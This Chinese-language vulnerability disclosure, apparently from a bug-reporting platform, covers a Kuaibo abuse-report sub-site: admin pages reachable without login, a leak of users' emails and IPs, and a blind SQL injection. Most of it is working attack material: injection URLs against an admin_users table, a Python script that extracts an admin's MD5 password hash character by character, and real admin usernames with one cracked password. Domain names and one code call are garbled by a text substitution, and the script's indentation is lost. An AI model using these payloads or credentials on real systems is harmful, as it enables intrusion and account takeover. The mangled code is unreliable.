快播子站(举报不良内容)存在SQL注入和信息泄漏

后台验证不严格，存在SQL注入,信息泄漏

1 后台搜索功能缺少验证可直接访问:

http://badrpt.kuaibo测试数据/report/search

http://badrpt.kuaibo测试数据/report/lists

http://badrpt.kuaibo测试数据/report/edit

http://badrpt.kuaibo测试数据/report/put

http://badrpt.kuaibo测试数据/report/del

 

2 其中http://badrpt.kuaibo测试数据/report/lists,可以查看其他用户的邮箱地址和IP

但是要通过burp suite才能看到，因为这些功能也是做了验证的权限的，但是已经失效，而且没有对验证失败做合适处理，所以代码中查看其他用户信息的内容还是可以查看到

最直接查看用户信息的地址是：

 

 

 

3 通过以上发现在http://badrpt.kuaibo测试数据/report/search/0/0/2，[2]这个位置有SQL注入点，是MYSQL库

漏洞 证明：由于没有错误提示，所以要手工猜测表名和字段名，还好是常用的

http://badrpt.kuaibo测试数据/report/search/0/0/2%20and%201=2%20union%20select%201,2,3,user_pwd,5,6,7,8,9,10,11,12,13,14,15,16%20from%20admin_users%20where%20length(user_name)=6%20and%20ascii(substring(user_name,1,1))=107--

http://badrpt.kuaibo测试数据/report/search/0/0/2%20and%201=2%20union%20select%201,2,3,user_pwd,5,6,7,8,9,10,11,12,13,14,15,16%20from%20admin_users%20where%20length(user_name)=6%20and%20ascii(substring(user_name,4,1))=105--

 

从第一个和第四个位置，以及目标网站的名字，大概可以猜测出这个6位长的用户名是kuaibo,

 

http://badrpt.kuaibo测试数据/report/search/0/0/2%20and%201=2%20union%20select%201,2,3,user_pwd,5,6,7,8,9,10,11,12,13,14,15,16%20from%20admin_users%20where%20user_name='kuaibo'%20and%20length(user_pwd)%3E32--

 

判断该用户的密码长度是32，应该是 MD5 加密的了，到这里得写个程序了，不然得累死

 

#!/usr/bin/python

# its a POC, please use responsibly

 

import string,urllib

import sys,re

 

host = "http://badrpt.kuaibo测试数据/report/search/0/0/2"

NUM = {"NUM1":"1", "NUM2":"48"}

MD5STR = ('0','1','2','3','4','5','6','7','8','9',"a","b","c","d","e","f")

 

text_pwd = []

 

for i in range(1,33):

NUM['NUM1'] = i

print "[try] crack %d pos:"%(i),

for md5ascii in (MD5STR):

NUM['NUM2'] = ord(md5ascii)

SQL_Path = "%20and%201=2%20union%20select%201,2,3,user_pwd,5,6,7,8,9,10,11,12,13,14,15,16%20from%20admin_users%20where%20user_name='yangwen'%20and%20ascii(substring(user_pwd,"+str(NUM['NUM1'])+",1))="+str(NUM['NUM2'])+"--"

#print "debug %s"%(host+SQL_Path)

response = urllib.urlopen(host+SQL_Path).read()

findall_hashs = re测试数据pile("1970-01-01").findall

found_pwdchar = findall_hashs(response)

if len(found_pwdchar) != 0:

print md5ascii

text_pwd.append(md5ascii)

break

 

print "[Ok] Password is %s"%(''.join(text_pwd))

结果：

 

 

拿到CMD5没有 破解 出来，不错的密码:)

 

试试下一个用户: yangwen (用户名毕竟短小精悍，手工就得到:)

 

 

从CMD5破解得到的密码是:qvod 

 

修复方案： 验证后台页面, 过滤SQL注入字符，

 

查看更多关于快播子站(举报不良内容)存在SQL注入和信息泄漏的详细内容...